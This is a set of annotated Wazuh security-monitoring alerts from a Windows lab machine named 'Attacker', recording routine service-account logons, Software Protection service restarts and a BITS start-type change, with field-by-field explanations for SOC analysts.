
rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533886.106732
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:47:15.5376499Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2371
Incremental log record number – handy for timeline order.

data.win.system.processID:  1948
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:15Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-21T01:40:15Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:26.694+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:26.694+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533886.108311
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:38:27.9148683Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43468
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:27.006+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:27.006+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533887.115645
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:47:48.6215646Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2373
Incremental log record number – handy for timeline order.

data.win.system.processID:  2116
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:48Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-21T01:40:48Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:27.646+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:27.646+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533887.117224
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:53:34.5100079Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2377
Incremental log record number – handy for timeline order.

data.win.system.processID:  3028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:34Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-21T01:40:34Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:28.582+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:28.582+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533888.118803
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:41:55.1493380Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43476
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length of the session key negotiated during logon (e.g., 128‑bit); 0 means no session key was requested. Unexpectedly weak keys can point to downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:28.801+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:28.801+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533888.126141
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:39.2603970Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2907
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5692
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

